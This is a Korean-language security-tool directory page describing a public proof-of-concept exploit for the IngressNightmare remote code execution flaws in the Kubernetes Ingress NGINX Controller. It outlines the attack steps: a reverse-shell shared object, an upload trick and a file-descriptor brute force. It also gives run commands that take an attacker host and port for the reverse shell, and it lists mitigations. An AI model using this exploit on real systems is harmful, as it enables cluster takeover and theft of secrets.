Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
IngressNightmare-PoC — 이것은 IngressNightmare 취약점(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 및 CVE-2025-1974)을 악용하기 위한 PoC 코드입니다. | Kitploit
도구/GitHubGitHub/hakaioffsec/ingressnightmare-poc
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityLearning & EducationRed Teaming
GitHubhakaioffsec/ingressnightmare-poc

IngressNightmare-PoC

이것은 IngressNightmare 취약점(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 및 CVE-2025-1974)을 악용하기 위한 PoC 코드입니다.

저장소 보기
248531년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ingress NGINX 취약점 익스플로잇 - IngressNightmare

이 프로젝트는 Kubernetes의 Ingress NGINX Controller에서 발견된 인증되지 않은 원격 코드 실행(RCE) 취약점을 대상으로 하는 익스플로잇을 제공하며, 이 취약점들은 IngressNightmare로 통칭됩니다. (연구: Wiz)

원본 연구에서 Wiz 팀은 PoC나 실제 익스플로잇을 제공하지 않았기 때문에, 우리는 자체적으로 제작하여 커뮤니티와 공유하기로 결정했습니다.

개요

Ingress NGINX Controller는 Kubernetes 환경에서 널리 사용되는 구성 요소로, 클러스터 내 서비스에 대한 외부 액세스를 관리합니다. 최근 admission controller에서 발견된 취약점(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974)은 네임스페이스 전체의 모든 시크릿에 대한 무단 액세스를 유발하고 잠재적으로 클러스터 전체를 장악할 수 있습니다.

동영상

https://github.com/user-attachments/assets/9e893abf-5c01-4fcb-ad79-7115b429281f

익스플로잇 워크플로우

익스플로잇은 다음 주요 단계를 따릅니다:

공유 객체 생성 (주입된 ssl_engine 속성에 사용됨): 리버스 셸 페이로드를 포함하는 .so 라이브러리(evil_engine.so)를 컴파일합니다.

공유 객체 업로드: 컴파일된 공유 객체를 요청 처리(client body buffers)를 이용해 ingress 파드로 전송합니다. 여기서 핵심은 서버에 다른 Content-Length를 전송하여 연결을 유지하고 파일을 열린 상태로 유지하는 파일 디스크립터를 유지하는 것입니다.

파일 디스크립터 브루트포스: 프로세스 ID와 파일 디스크립터(/proc/{pid}/fd/{fd})를 반복하여 업로드된 객체를 참조하는 올바른 디스크립터를 식별합니다.

사용법

필수 조건: Python 3.x GCC 컴파일러 Python requests 모듈

익스플로잇 실행:

pip3 install -r requirements.txt

python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/hakaioffsec/ingressnightmare-poc/blob/HEAD/attacker_host:port)

예시: python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443

때로는 admission webhook이 다른 네임스페이스에 있을 수 있습니다. 이 경우 마지막에 kube-system, default, ingress-nginx와 같은 네임스페이스를 지정해야 합니다.

<ingress_url>: 대상 Ingress URL (공개)

<admission_webhook_url>: Admission webhook URL (내부 웹훅)

attacker_host:port: 리버스 셸을 위한 호스트와 포트

완화 조치

즉시 업데이트: Ingress NGINX Controller를 패치 버전(1.12.1 또는 1.11.5)으로 업그레이드하세요.

Admission webhook 제한: 웹훅에 대한 액세스를 Kubernetes API 서버로만 제한하세요.

임시 비활성화: 업그레이드가 즉시 불가능한 경우 admission controller 구성 요소를 임시로 비활성화하는 것을 고려하세요.

QuimeraX Intelligence

QuimeraX Intelligence는 복잡한 시스템의 심각한 취약점을 식별하는 데 특화된 고급 EASM 및 사이버 위협 인텔리전스 플랫폼입니다. 이 플랫폼은 보안 위협에 대해 사전 예방적으로 모니터링, 탐지 및 경고하여 투명성과 잠재적 위험에 대한 신속한 대응을 보장합니다. 고객은 시스템이 취약한 것으로 발견되면 즉시 알림과 포괄적인 보고서를 받아 보호 조치를 취할 수 있습니다. 자세히 알아보기

Hakai Security

Hakai Security는 보안 전문가들이 설립한 사이버 보안 회사로, 기술적 우수성에 전념하고 있습니다. 우리는 진화하는 사이버 위협으로부터 고객의 자산을 사전에 보호하기 위해 고급 침투 테스트, 현실적인 Red Team 시뮬레이션, 안전한 개발 관행을 포함한 맞춤형 보안 솔루션을 제공합니다. 자세히 알아보기

면책 조항

이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다. 명시적 허가 없이 이 도구를 대상에 대해 무단 사용하는 것은 금지됩니다. Hakai Security와 QuimeraX는 이 익스플로잇 사용으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

도구 다운로드